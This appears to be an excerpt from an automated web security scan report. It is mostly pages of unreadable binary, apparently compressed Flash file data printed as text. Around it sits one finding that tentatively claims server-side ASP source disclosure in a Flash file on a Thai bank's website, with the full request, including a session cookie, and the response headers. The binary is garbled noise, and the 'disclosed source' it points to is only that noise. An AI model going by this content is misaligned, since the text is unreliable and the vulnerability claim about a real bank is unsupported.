.6p......qY....N..=.....gG)^gO4i.p.C...Q..../h..(.V..}...:G8h...,,...2.l.i.....Z*.V{.    ...L.$..]......R.cM.ipuR...o._@.am...[..N. 5....:...........<N..E.P.jT...Ay.....3F...U..NF..W.......|9-.@.......vx......r.<.......Z.....M.!M....L._...............6Wzl....Y..4..N.;..?sP.Z7..$.B._E...uZYU...p..7.u_f.3@...{..3...Q{O-.l2..6.w.....)X..J...@~...A?U...9..r....WK.......V...0.sEv.-'A...z.%r...nH...'.d.N.l...l.O...j.0k.....O%....d...p.
.xs.\B...kk_........zHX..{Kt"<.....'................&+...p...5...j.mO.f~K....k[....5b.K..+./...7
7..N...nhS....>.V...A..n......D+.u......p<b.C..X.{.)/.d...^..^]......*...kf.......n.]<V.rab[......}.....5..<1.#..}......=.u{X...>..';....W.].^I.../....IctZ.yi....|G...:H..F....zg....{:.:.;......I.........E2*...'v.*....%.R..7.@.<...    .Z.........t....._.x.S..
->..*d.....\....[w5........2....1.,..CcU..|~*..6.*.....i.GU....\....q..R....q............@....0.....xcNw.^.j.....%..A..($....{.W...A..5:..]K.q;.7.u`..wF.&..{.f....F.....EA.q..I.5....jN.B...{h.7..]$..'YS..;eh.c.....o.%.6.6......|.......c....!.m.L..v.)].(.....8.q..{.i.....o.b7 ......N.5.G%....6.p.T.$..t...........;..&<V;.....+|*...)..;F...#......o....Ipm
..H]^.H..$...?Q.\.........R...s.5.m....O+`CA...m.^..$..A.-...Q..?..)...........i9..eq.%..#..?........]E:.H[4..8 ..W.q.I?wU.........8..>.f...i.v.U.....#.m.X.XZU$..C..5w....Y..r..H.s1.$.jr..,..;+.n.t.'Q.V..-..Ai...J...ZU")..    ..UGWJ....p-.Q...........y.n    .E.n...PX..<...cv....[...3..A....4..t.j..$....B........:U.k...}V..:...].V....(n......+.."f4.M.    k..{.C..nq2*4.u7i..\..U...2Qwt...0}9&buv...D..d..5#}~ka.....d.vEH
.    ....0..tH.H...k-..{.........A.*|LG.d...V.....h.$I>C..r$..|PI........O?.h..Hw..jLk#..i.t0.....u./x..LOX...').`.uQ8..ZN.t..v...O. ..5..Gd`.9...*v..vL..9.w.Qt................%`..A,#@9F.+ow..v.h.....Y.WS.............eP.]....wOp............    ......ww......7..V...........3...:.=.~.O.S.5...w..TL.!9..W...FU.l.2.7E.h.L.2..g]_.....G.}....O|.;...&h.2...p..........m.f.=..g.*_.>......Y.....5..+...A.
.....U.U..t......re..\.H..0j.....K.....eb/.?.1Z....T..~.`GP..V.(.n.t......=.....    }..k_..)?....i%l}..&.Ws.a&..H.....>/c_.ml0Z...x.k`\...j.X..>Ilv..
...M.S.4...2.....G.U......w&....6...R...p._&.6(..$..g.$[.....[...J.....c.YD....:.y.......y...7..L<...C..`.=...au.....*.....^..2.$.s..|j{.X./r..AE........n.>23..\../.4.;.p.>B.....#....    .<Ij..,...it.    }.........Wo...R..........s.m[,.?.@H.#x.....H&.NK...#'.....u..K.Bm!s.M.....w    .d%ust.....B.)....&.<Jo$.7.W.YE....LN...<...(.7.k..J?.    ....V.cA..H...
..D.;i....1........O?0....m....V.    .....1=P...Z.*..Z..qfl...%..D...YL...***N..e..L0=9....r.`R:6.~...    ._.t4.T..t.&..<..uK.J...l]..M..8.`..>..{;..u>.Y.%U..Mjl6...7n....._j.Nf+7..|r.eqq...\....N.m.2...+?b}..d0...W.F.}<
.....    y....#.BA.j...1.&P.........&.[.C.*....%w.n....$b.....u...>2G..,.k|5....../.....o8.,[-......Z.Z....eR...?8....(Q..U...s.=4 ....Bir.P@...J..T.1.....9..).....a..X.:...r.i...t.;[v.>a.J~.z.]![6..E.&k....KOF..pm2juO..}.L?i.-.s....z>.u...)<..9..0..t.-Q[4.]....[....2d
M.
'I.g......aU..k+...w...#.Q5....~..{.r..q?~..?..M.....4...=..*...H{......8..ui;.W.b..I..WM...:t.......q.I.K....DY.Y..B..@m..l...P/...SH.WN..
.S>p...N.!b]...............[D>..d..@...J......Sf.7j.$...U.-].Ub.[.v.....>j7.Y...4.W.Qz.U..Ab...S...... ...J.o.}.'z_.OYj..Zt.Zo.....b...
?._l...5HN..m.{T...>ThR`.\....NUs.4+.......p../..&.....#>{.s.4..U.q...}..].%..........k1..}.....',.s.bKd...\R......5.<A......~-.....rwna.5}..#....nc.....J...W.L.J.W.).(.v......-.....2q.U4^.nj.OOO....^..Y.al....,......V.[\.9iJ....K/.HQ#....<.OD.Irb.>;..k.,.4n.._..74Y.K.....k"/.....5..a..&t.~.qxI.}..a...=.]^.q.)$+.
.._....Z.E.]cB.j=....&..by...?a.Y..4.'@,.v.'H..GS
..S.4Y...<..=w.A..oC...~...6...:w.qU.;.........?6....g..._.....L..?X..17....$vfk..j.;.....I..F..`...!./..,k.f.......*0o...=..'%....
..3_SDO..s.y....1...A..:N.!]K    9....._;b..g..i)...z.|...o..T.>...So.....?'..:..........I.....m.P...A!.U6....;..Z(Y.j.]>X....5..z. .,q..t.... .(......7..7#G..?...;...vA.,;.[..:...>c.s.    .b.......E.,......k`9.Y..l........T.L]...!......\e..37u.Z..|.s..........x.&............_G....F9...H?.1...G.8......    )c.w.\....G3$`...k....q..[.G..T~.[..-..._~~/...S.....l.....D.w.{1%4*.........6..}..4O.(I.l?.Tg.@........r..^.......-....\Om...(.)....J..D.n.Mp.....O.......-...q.<.
...(.4..ZHQ....l.'K.tg...]t.Y.R....b..&.-".*..g...[ .gO1.c_......Ev..`g..H.:..k...l.,8j...v.".JXm...W7.....p..P.zB.>...tT..d...S`...v..b........$~&FAm.C..(@x..Wu.:...}.992.K...9.t....Z.cL..[o........5.W..?w.G...O....P.a...4.......L.Dg.....]....    .@....?...R..... `!N..+..9._.k.5.#.pO.Z(.Mn+E.Eu.w.p].Pq.0.).vy.l...Ki..~..)t..o#....[...5]/T......(j..]....k....2a....(n.Q0.2[......-....Y..4.'Q....6y8jn..1..."h....Y(.    ognLh...5k`.T...&..;,..-}|.RlA...@wqA../....f'l.<..$^K.H.~$[2.ea1......G.....".-[...w..T8...!.=..Ung'....q.....r.Y......H..2....g....].M=......O..3....M.. ...\.g+.....V..U).+.b..r...S......?#D.*`@."xAV.bYD/......../u..Gzh>..K.I..x?.r....k.a...@a.W....cl....kmX.{...}../.4m.._....bA$...).-.E\.
....S..y..."x..@.....yv.FT....vnVDB'.......l.n.e....,....OA...X(...K..l..|)..J.E.:o.K..`..t....L.j...+../K.A^.....P3....U....;."t$3a........w..5..V..I....\g......._..lt...Sf...G.`N...=A....9..(7..Vu..5C.4O.8^.. ...Q..>.....Q-1LM|
.D.\....Q.A...E..Yk...S..Yf.`........|)P...S,............k.,.".4..b7..i ......o\....F[2?c...Y....O*..t.2.......@/).@...o6.@..*.,...H.VQ....$..c.....\...V.A.q.@...[.....&.o..yJ.......Y.....b~.%).    c.z...8x[y..9J..2.s..%.;").G....X.v.    m(&.....w@N..pQ..}...1.T,./}K......Q..f..P....}..~...eQ...T..    ._z.g*.......U.L......j...Z....[.1.G.3........m2.L..$TJ1.[.....y......9..o..`.Z........M1.y....'..
..h/.A"..    tH...f...X[ges...rc..+<:...F.~......./....kd.W..,..6./........'|..X....{.L.e.11.!......Q.*.TL..."#+.....z...A.X...z?.../n..^.b...<.R1..b.!.5...z.O,.Z...}....&... .R..P..i......I.B.....Q+rp..(.....;...cv..R.....h.H...'d...F4..V7-.../;*v5.jf.?.    .....pv.(................#F\..
+z.@*|7.%.....Dpb...3.<K`O...........{..jk,=...$|o...@..b......3..#....?."a~..-...\./. `..PW5;H.oB........*:C.=..F..8..J(.0.!..@......,Yg.Z..R..^....xv.O...V.....h............L....~...C...4.]J..V.oq......|.0'4..h..A.5...]V_<q=+..gt....Xk."F...i[..sv........Q^....1.T...iB)p.e.....s..L....J,.v..3%....}.'W............N.M......V....*.....f......Dm........4I.......%.uk..]O..o.........Mk.x..y6...8.w..be.c..TpK<.. ..........k...Y5.}..k...ZzIx.Hm.A!k.....1.^!..s.;`.!n.....<W.=%..j.=zy.)y.7....-.......'Z......gc...a[qy.!_.....$.j.......p>F..@Op.{u.U.B...bO.tn..n.......S1.~....p\1....
..=H...Q..^1R...9...$.#...g.!..&m.........5.e...b:...)..,.%....5...I...l.......Li.......DV.......I.......    ...\.$U.\......R....z.....p?.k.X..k.&#.~....ew.X.o.Q,>|h.Xg..\
`h......7^.....m..|]Y..n....-by....M..........2.[.....H.U..Y{..2.Z..|.Q.4C/i4M8p..;@......^$.PM>`OD7...n.V.T.{.D..E......{.UJz..>..&....Y..rx).g.R.?....b..}H...]+gh.K.;......h~....E..f..g..F&..;.u..<.p.&...F.....W..S...rf.Cu..|...N:.v.V.$K~.h.1X.<.].6..{...G..r..i7B......$.M.r..2..P... .........\.s..z.]*........c>.i..?..E.=h..<..9z..hf.^.V=@..h.+.K}Q...6.gJ..]kpf.=I.3.4:6&P......g....NN...&.
f..uf.0....JG.5.^...n6<....)k...e..)..<0D.F....E.E.}..h)..;..[I._^...=4..../...F$../..8......J...|.&.%M...3..O.s...w..g    .S.,........v..{z..x......4...W7..I... y..>*{`.e):....Gw.7jM..0..m>
...X.W...9..v...R..6.`r..    .C.*....E..pqD.. S'..2vL.1..?.@...EV.{tV.DF....C...M....?.....=...S.7('I1...Hu...&....1.q.E.
...BL|.    U....6Y.....F.p...xT.6|......`...3S...>q{.>....K..p.....tD...a*|..r..-.{.*-ynN=Z.....p...-Bx|/..).P..f.?)..m..f..,}.j.5...Yn....RH'hR..JD7.|}...V...l..TS....sFR.+.....M9%..!.H(......r.n.1}...?W.CZ...i..x.~.......Kl?.._.Y...x.Vg...K.E..5B.fd9-0x.[.#.j...Q....V/.^.....A..T..|..Mc%.5..>.Wo<.'(.n..'pyq1.B....@.ao..5%.13t.V,..PiVe./..NX..lee..p;.~(.04...1)..2.U.F...M.y.K..........i,tL..qn..3.2....x...P."..ik...T.F..%.U.....[....(...3..Q..9..'...D.a.<O......<gq.,...XjY..b.tU0........@.p;...............*..5.0...p..@W...}.....*v..Q..9.3.C).....K.........;.x.,..P......!1mh.*    .,..NF...*."_#    .{...V..P.....2...._/.2A....9i.........S...Q."h..y.p.uY[4%.0.w.Q..y....q..
uc.1    ..I`...........)Po.V.EL.....=w.kr.+eMcK...P..#K....a0V.p....8,".....0kM|Km;ym..M..iE....\...E..W.KC.r.....K...t/#.;.....pWeQu..:.6^ho...1.....\8f...^...1C...5.-.!2...I...Y.?`....P[.A.4.H.b..U..V........kl....{a.YKL....`])u....YIL...b..*(.z..=....9F2.~..p.T._#.....\..i!_..j.z.4Z....\q..YE#6S...Y7...j.,.Z{...tB...0E.....<1'!gM;(.N..7.....B.{%.^*..m......R3....11..q.Kd.I.{AZ.XW..>.z......$...#g...?......1.+....Y<WN....e.....H.~.X`j[K..Y...3.(.W.#.L.I..}...1B.o{.....u...@..o.2...'..2[}...X.....z#..~....tZ.
...=.(...S.I........E.@..xt...P.    ._.....C.$....9J8..L.....E<E.y'...N.W*.....+....0.U6...AN`N..X...V.....8%..E....5Zb.!..1TT.........,....S.C.~........<~;`.lut....|.P.......S.7L..09....S(x.n.........y..q....5#..6j.q..y,1..\..d&.{}.T.-P......tJd.......+..1(.N..!>.%...d...GP..J..{.`F.'..K.KG....P4h.......S..
...p...7.0.h
.B\.r....;.?3......z{Q.^.F..e.[..e.../.q...........@_..^R.q.....09M....*    .W.I..A.r.......B.....j....!.....l)m.._m..Z.B...<f.E.dFp.Z.OF.m.)..X......y..J..........WIx."...^.f..xZ{.....O..
T......?f..j:.w........p.];.2.[.9W...l....S.~........*z%..Q.#.}&...&.us...4.*.f......:..R...NT...$E.)....Ghy<W..%)~....7..P......\.m..5..a.P6...:P..r.[.......0._...w...yb...4.........2)Sby....#N..........*$,..a..;E....G...g;.    .C.k.0.U...Q.:}..U?/&.v....D\'..h..S.tF%r.....Z....9.I..[.. Q............6.......!5.K6(CMo.J.l.....Q..t....u..[m....h!.B.zK...X.......N...'..t..}.Rx.5SUx..q...M.fv.X.....h.,*y....:..`.7.X......+..@....D0...cX..}........%..f...r.}T.............J`./.mD.N.k.....]...[..w....O......'..Z...zS....F..^.f...f.....}....x0...D7.4...Df.......P9..l$V.G\....
^....j.L....:.....R.\..o.y<.b/.u.m3|5..^).....r..%.I...    ...p...2b.E.B..z*.!....{v..6...K...HG.Ap!JBqF,...3]..[A.h.>.D.W".V..;.......G.D.v.R.r.> .X`).....J....s.v...b.6.....h.@..4..........:..e.....@........>...tI..T..c.../.[.AE...~....sHOF...$......<.D;.j...8G.}P|...9...N.....mO..b.A...U..~.mx...;.a1..*...>.p.J...5..!ul....=..p...w..iWs7(.u=.Q..C6......T+....o..FR.+....H|...>H...0...4G.......$.m..9k
.6pq...n,i`U.........^.e-Dn.....
...ej.5.,.7.IWo..X"......s.Y..9w.R9...`....... .32h.......d.Z.[|;N......Qi..@...W-I8....U)......%.u...~........FD'.I.)M.........UF.#.O^.V....J3.h.a.....k.gKL.R...<...../..h...~...d.; .T.....Q.f..>;..Y).[..G.y...(.............A.c.,`k.v.By} .."Q|......O).3-..F>?$.....C..~6..4.......O..=h./4.T#.u..~Wz........&6....>I....}.X.).+...j..qz..o...0dn...[...    .e.I?.B....+...n.O..&.g.5..|.....%.....0.....J-.b...M...........P.,..}0.s.S..<....fH...!..PK..kvg...h.c.....b..U.;.V2..?\...    ..G.._..!.[..\^..L^../.x.2m
Wc0.uV"...E..%z..$..;...7.2.T#G...BO..2..$1.d5U.+........s..5.1m...O..9J.. F@..D).N:.....N..m..%o.5I.
..f...]....K]...}.-#..... .;-q./.:].'..',.O,......I..dd...@.d:.:>.YCQ2...=.O......8.../.('.b..x..eV..\...+..nwT...&&`..h.    ....<....XR.P,..<..O._]*.e.....s.d..I.Vg.!.^,..9
...b(....R..$_.*C.d)......d.#d%\>qC.vM...v.....e./........_.`.mi\_.w7........Q@-.0....D....M...+(.......v.z..<f..n.I......=....%
!..y...R..*...<`...2...a..]"@..............1..j.lv......d../.B. ....I...cJ..F..}.'H.;.....B./..\..".zD..<.......)...$H`...b.#.f..[....I.].4...g..W\...c...2J.Y...S..$F.iH]....av.........-......t1.!.V...P...j..].z..U.?!...a..6a.^.^g.Z.......I...\.n.......M.._Z.lh].An.\...U......4u..E....%>
A.B......".......h:.....b.....Z[<.!Hg......q.Z..    .....j.n.<....{.\.0oh.....Q5'....l...z....i$=0q...    .$!......90...>
...[SNIP]...

18.2. http://www.ktb.co.th/flash/a3.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/a3.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /flash/a3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:11 GMT
Content-length: 122987
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:18 GMT
Etag: "1e06b-4c723a0a"
Accept-ranges: bytes

CWS    "...x.|zuP.>......./..-V......R..............r......s/.d&o.|.Mf..$..h......@
......o.....pQfP.(..........$.
..0.W.......&6..x......P.L.......F.>.._......*,..........G@........3""...(...8X8Dxx
...[SNIP]...
<..Pu.9....i.b..j....>....zix.....>.......vp.+..._w0.#.$...pT.....7...>.sh...W...A.[..@....t}%_....`Exu..Q.fr..M...Q.g....&......N.S..|....g,.|...d.l.#.J.RIT.......|.~l.4.<%..%.....4.O6.."$r..'.....~<..%....B...`.m...U...9...'.......K.....C..v.?..^....G.<....x@.`..`K....=...=7A..J..TF.]|H...Ez1.....;..>;.......<k.9k..n.......Q7........,.y..\a..L.aX.o..W....'....2\.......Do..
..\....T.6lm....h....lf....^.XN....>. ...9.N.........U...0.u..0..$....W/KA.:L..^..C.>1._..u....B....4bG....bZ....)x...m;...-q.P.......-..\..    .[...).1.h.    ..\..{H.^_.H.SB.%..}.L...b.;\........s.g.d".>o..`.n..d..%..,........Qw...Z....J....4@.....bjF.........8....d    ..kq.W.U%NkV=.X.X.J....    O.#U..........<.9.t...'.........9C.,d.......\u.~.~1.2x.q............|.......j.u;..&1....p....    ..V.?..:..e....k?.b....K...-7.............I.R......3U3D..........`.|7<.8...s~)K...P....UHclU\QK..*....l....By...sw_....,..;.#j...    .;.P...d....i]...M.mT........J.B._x..T....H$.....aQ....4<....M...i.G.."D.%Y..h....U,.k.n..4a.Z......Q[f.....I.&........C..W........**U.u..W.m.Q....b.....)..N....a.....e-../.|.'-.4    ...b8..n<...._.c..|..u2.^..p    <...:^E...Q.*..7BD..^.u......8dh..d.L..p..f..<|.`.:.Y...{.........vW
-.y..M...0.B..RoG._UB=`..g...o...00....n...89a....1....J..\.;.".-.V....9...B.. \....9Z.Br......W.WxT.............~....$.U..T...r{..v..G.2...vY.pT.o?.&...)..D,.|}....2gYe...s..t..g}dn..~.|...+.5.|_....>.4.....).}.?-..$.q...f.b.TX.2.e].N37..Y.w...bZ......};&..A"..<y2...:.#.Q...K...!R.2+!.....i....E........n.7.5%+.\.*..X...f..v^......u..v...j....v~.......ztAVJ^..f..J.....<aOB9(.hj. f.n..3m......"Ou..O.........y.............Ip..r.2.}y...qi..M.;.c.y.G    .;........8{z.8&.`9..:.....;...u..N`7.Cl.....E.FjGl..A.){.......||....my.)...P..<.KAi...?c........g.....>.......W.T....h.o+..1....X...    P..`J...0~Ja.    \P/:...#..".5...J...B4M....]..".:{.#n....?....C...7SQ.-.2..j.B)).N...V.....O..ko'...-....$....H..)..w....9.-.aWF3=4Y.]l'...ca@y......(M....q.lF..0.....H..U\(..9XA..&......p..M_!....%.G..6..K..a...G
...7..|.....'Q.6.._z./.?.Q..........b....:...r.4..........&..R...].g.....@'.
...e.....`............T.P..0..0I[.b.tG6?....M....U.....e|P.Q..CX....H.;3I.N.j...:...K........T..G'................$.L{.3Y.$.........K..Oy.CY6.../^..".$*+^z.g.F.-.k-LY...y....,.|.....A.K....lJh.:t.....5{.    ....t...so..TW.s.{...#|...].&GeO...z..`.Y/..7..,......N....>..m..mFN..-...............v.&...6.z{....c:7..i~..o%G)|...E..5%.,+{..i..*n.:...A...8h.k..h.wF-.....%.|..q.5..o......D.......D5...MJ..K..K.L.s.
g..,...TK=k.6..4s8......N.>..x.."..]......Za..(..?.....!52M9.$.
...`.............z.`..]..$...b.gO.X_............{N._.*.}.p.b    ..b..Vq......Vm$I....<................R........E=....U...f^T..>....DM...W@K...//.
.    ..nIo.V..T..j&z.I.oJ.z.l..,.m&@....._]^....G*.]#|<
..s..N(....3..;.^..e!.`m.....Y%.....}x.t..1{......d..lW.....q.......#......N.}3\mC1/Q...y..Zd.?..........Mj...pw...6...x.....s(S.4.+..+.....D..9......0..^~Y=...sJEd..B.Kc.{..........k.7o....M"...B0....)i.-...~....4...7.KR..."S*K.Z.:.r..X.........*p..yp.......6..1..y.....t..b|.<.##....;..Fd......y...._.r,.2.C.w/k.o...7Y..8.OI*ZTy|.*..
5'........6.....l.fIM+......G..n.<4D1rgN.Y"4..NM.+..C.v.2.....1C....^.m........C..g3....N.....q.3Go..Q!@
......<....6........m..l...*.&~..L.g..z1......NB.I6.)....d..]H...Q..N.    ?]..=....j.?......2..........`.z..+...a!...5....I..a..D...WB.....K...9,..5 ..B....0.;F.a...7'.}.b=..b..-R.V}....".Zz..I.1.~....@6R.IDb............:.&<N...........0..[g
.b.F..U    ^.Yf.....]...S5...k:>..cF...k....`y....&OU..".C.D&X....W...
.l.8...Sk....]l.,    ..U.    -.2.....$.K. 94.Z.....t..U|..........c.j....E....tV..R.......m..|..[.4..dE.U.@.|J......6.?...'.s>]..+.[.Y.oc4 ...b..D>>.je.N.....M.B........=:.%W+........"..6.>..<.c...-..)?..........Z.{M\.v}..9..#5.a8{...p..{..nF.R....k.-. .M..I.G.Z...fF.$F3..I...EA....S........P.Wfv.ke.bY...ru..w..:{y-.....D...qN.%.b.JM.......kM..!.t>...kk.L0...Ak!%......y.`.J.~..f..s8.7....|....'.".    U...k3..u.V?+.........k....M........@.b/.5QP..........n.....D....V.yI...2R.lQbZ......oA.A.S.8E    ...<Sc.Jf.~.p4m.....sX.*..3....v..(A._I.........hW.%...xC.AT.b....(U._e.pW..D.kV.....n...8..W...C@.......Nemx*. .U........&....@e ..P.....?....T...h.....k.mo..>..di4..#;..%T.@..........z../.?..7.;4(t..QJ....&....a..E\.:=..K....q...k.]n.4..R,.B................}.7.l.@........(...\.3i..P\.ma.M...=.......v.ZD)..O.&PAy.[....&...N.z..4......*...qg.k).p...o.V..7.K../"..TI.@\.....x..8...Ll............t....v..{^..m>.y..:......y..h...b.=f..X....6...l.....v.....].6|..n....Q.y(.PcvFarE.......U..6.D...u....s.&=.R".$..r,J.K3.i{..pq.....`d@.@.-...X.E.../s...K\..{Om.M....$e.&.F...H..Ow...I...W..5PZ...Gh.......E^..6...r.>d..qc...9.6<....]..o..|....>?....^.........>*....*..t..o....~..|...g..H.....$B.....*..l..D..zk..F....}..qrq..I..K....&$.....0.x..8*..ex..5...~.....Ng..u..=.{{..6^...W.:x..N.>rV.gI....B.....|..3..,k.^..[i.......3G..H.0]HY.3.A..RL+....{/[?}...y4...T....G.y...[.ZA.$.2:.    .......3>6..gG.=..Y`.$.=.:...&.D.....5.<.Mq6."OuL.f.>.M6.4.\.2...,..;E..Y....+]d..o.......O.F.........t.c.,z+.....d......m'_...O.j4..|.C.......p..k...R.....y.........E..#..z..Y..(b.|7..#.z.nA........}2.."..%.....]..Q...C./...].p......'.{.........lLN..].5z.........H.x..g...oEi..d........O.2.$-<..A.%v/.... ....v......>7....:..gM...M,..F...T.8w.7.7.Lu.c.nyo.....G&.`g.h.UC.`f.l.1Skq...".q...b.......i|=d..;2..4..y......7n[.........,7.N.N..b..x..UA..,./M)..z....}..8......."....U!.V.D\.!..{t......-.I...Y.z..a........"..!$m~d...a.a.{m........eq....WG..i..K..t*.Er.
9K{.....t.-._....&3...VV.>.....y.x.(80..vc....I{..\..z__.T..B..H;...k..b.0=....p...9...o......a.;.+H.p.....-.....[.{W>........v.. ..K.mN...|.........}5....n.3.......z.}To..G.@".}...).. ..^...kfd..0.yv........y/..mp<6b...,>........&...y......!@.h.    !A....8...........}..I'....z..(..bH.b5~..........|9.........8S..8.q.........z]....t..0.
....</FJ.$u...{..0.U9I.....!..y...'.@kp..k...v.l9...t.6Pn@.xs.......>.B..H..(F{.p...FX..H\...1.F    .|.{.....E...7....FJ.[-..0..8......N=t.X..`m.............Keg).'....j.u..4..X.`...".*.......k.{.)`7.....1.`.7........C..{*{...80!8aNC......a.......U...w..2r..1..S.......77.-.].Z...u.U.#S..?hV.v^..H...z..*.x....\.+.Z........WO.y. Y...19qQ..Qe.Z..-8:(...cQ.v.vK.?9.8.d.....Yg...q...8R.%5.*<.=.&P.b.Y....4..(.b.].l.,..Zi.HX..*.........D*P.E..0M$:?/....!d.H..)....EF.!...t.,..v..P.l.p.......[:6.':.*.c|..._....MV..v.E..D(    ...(..
j.. ...p#...vx....H..T.}.4....5B......qImC.7@.-.F.G..#........p......Lp.....CE.....4.G-..V......4..O..T....(...V@.....N'...O..h.&?.......e.}.]....f...k.1..6....^.~.....rk4.F.3.... ..M.c.7-Z#O.3?.........y.S4.......".....\.Co.4...W".......U..r....n.N.Z.Mn.].n.Id.5
.....r....Y..T..../......e.E.I ...R.=..j:...-.......l\....O].$..n..ddK(1.I.x.-.....kA.v.6....M:...`.<.....F..h.b.S(h..j...=...rjt.u.6..uP....~?./t*....d.I.6kH..x.(...Nj.[t..c,}B.y...V.+{.....mS.....@o..Xj...n.n........xR1.3,2~...!6.....i.../u..u.....~.3.u}|
V..4.?{....cq6.I.....5}.{+.b$....J.~.t....c..1..}.....5....I.r..{=....v..&]P....b......c....D.\..s.aI..uYe...o..cT..g..$..tu.F.;.J..nZ...jR...F.>.X...
....-.A..o/V..X...O3..H.7.X...........K..\._..S.G..B0.......Uk.b.........u...:E6..:.X..0{./....D..~2....s.V...s...".!.Y...[.r#.58..%g%.Z.87..Z.....%...Y...G.0<-..z....v.).......H.....bB..    ..f.c.FRU..GB.{.u\..'..6...C..d@=...q...*i=..........U.j"|....%..op9_.....M..Fw/7mzd...Q.I.e`bb}.    ...>.v.k...x_5.k.g..z.I.X..F.A P.T....f6....i3...}:....../Mv.o..OW.-..d.".60...q...mz.7..:.....~..Oo.B...w)..31.....o\.2.._.z......6......f.G3.\
..I..]......W.../>....?...c.....s...........O..x.c....nAU....a_M.u.\\K..?/k....V...y.I2..8...K..........W.I...m...$;lr.......Hc...f#....>{.Mz.7....U..O..K.j..I.=.".k.......e..gk.1..Q..5..O.......    .p!%..0v<A..........F.^&'WK.l..x.0..x....0.Sq~.U.od....{.m&%K.......(..........;@..w.I.qry|...Q..K+..]..-.......Ym...O"..tz}..:u.,....@z...8..<.^M...gl.K9.>..w...#.U..gw..H....G...$.....S..^o....K6...M.l...|....E.0Tb. 9..9... ......8giz=..".z..h<...p...R....Y..<H.V.....ke>O*......k2.V...@...n...^..1.}^W......p... 2@.    ..L^5....a.......2.....w..m..M...i.....]...    RV..k...{-..............d.5..I#G..U..|/@...-\z|..[.^.....o.z...h...A.....-|z...+.......<...J..R2..HU=.....{m]Zk...M..9I&..1|...n...NMr.n..l.].....Y...........^........N}...X.?6LuG.[.W...*..p..;R.....<...E._6.....kC.8^i@...|....._s.f...k...\....R..\.....c..u...J
...........K...2.......#....Qb....{....(fuu.|.<h.=..jY....;x......>a.T.cxN8tWw..o....^......`n.|V..'.e.X9....9.+.D..P...<x..X/1..-.....C!....<."....6..n.4`..3Z.I6`o..i`0.....0..b.f...    .......:T.g..Oc
....ll8...K.."1..B........\-...
..f..........,M.....?N2.....U;.    ../.=f..o../...;v....8'w.<.m.`..!.t.+-"...p.d...3....Zz'R..m...?...6..X.....DM.u.T.X..Vm.........4^..4...YdP.....F.2....MA. ],m.K.6a.`...6.U........a..#....l...X24..bh..cu....p....#..X.kF..N.G.b.j,%iY.a|..8.k^.ft...Y...5.|H,.Q.$..EHS"..&^...Mgi.k...$.M.J.......p.tjd....4.....u!x...n.y..O....H. ....9g.;...*..3. ..../.........Q2...:..u_.U....G.68[...S........o...cKl...iS][{3m.$I..n........f......l..1..o.....I..A...b!..X..1.
(..~.l.HU..l.lJ.U'.K...k..j...[Cb.au8e..OXq    ..`.dPB..y.P......D..V..$[#..V..s.R..z.#I..PW.f ....\..`....!X.l#b08.U..g).?X.....N..    .M.+.$F.........c.....;..Xwr.1.T.2$.9(.T+{l..s...2eh5,..u.3..@...U.h..*.H....A.......d../.H%c.O.*...pY.....q..zx.. .4..'x.........4.v+.H..5....{.....n....(6SP.@e...s.+V.o..i..9i.W...Q.mF.z.O.}.rkt"=6....X...N.*p...    9yW.....u.1c...3..cQi......j>J...?.......?...I7$mj..&..../..$..k.T..N)].......E.L....UVI".!k.2.>P%.te.7.x.;J...r.`..:s4....JY.I..Ip..T.<N....nW.....E....#...0+3H<6.oi.. .....+M{-.qR.y..1_.......Ac)...n............4.i#..g..9r...lNb.Z....k....T...Y,.A.c..&.N    R..$..\.-.O..].Z....4.;.bX..Q......1.......e.{...S.    V.b...@...{..a...T#...1#....2$vL.!.$\....9zjA..J......o..\R..yd.$(<0.e.. .uR".......$..9....SE...3..5*........U.t......i`.....jb........".>....T..I.O....^M....3s.........m....y-..G.........:M...k...w\p.....{g.x._#.O..'....<..o.a..{..s..uu.i#...!,s0?k.......i>7.Mk[.[.rf._.9.D..PB....u
.......I..3......<3.....o.Gn.S..Nb...=l......8OSK.r..Z...Vx<....5..=...>m.3.....<...... ......@2........E.V...@.....|......k.........).K..g....i.h'..O/k4q1......).U..Rb    ........-.d...,...[]..O.Hn.^..r...v..I{$....X....P.!...?.Y.n...^.cm....}...GB.=.9..:P....4o.........x~........]..d.O....i#d../........}........i....*G.4[..$.......t.d
@......f......o...,H.}.{......)."..M..HG2.")n.&..8..&>3?...*...?.w.......{...O.!..t.
..72.AzZ.-.......7..m...0.Q......ma>.P
..YQ..*.n9.......o.t.u.....E.<pkw]g.u..f.......agQ...W6.....o...q..e...]..^\..".t.`..6..4:..<.....).k./.N.L}u..o.z..........;[.I...p.G....\..O....z..O...r....sK#..G...by.Y.oU.....W......I~..........f...y..s...........]_..#>.Q...Dg,...::....-...?>{.x^6;....O.........?..y.B......E.~........k>....|...._.T..<...Zx..f.r..hV:|.rm...K~.......N..>...r.o...}.....>.O..i.._..3...]7~t....d...hw."n.$.w/.q..]N....`G....v.......^$........c...=.Dq........i~.._.K.(N.U.(x...q.....vy..R.^...a...(.$6S.g.E..j.............f.<..........{Q6.(........w.    .....
2...s......P..m....K4z....{.lE...^g..t..G......%.>.R.
.@..[.1.o.....C.UEP.K!9.K...N..@.2......".92.    e.....g..~J.M.....\...v..*.....@.../6..$.. 6$....u.O.....k..6[.|.....:.XX...-{.....U.....7.oE3......8.~..*..6.I...p...,.....8P.9.`.^...
.....o.[.....
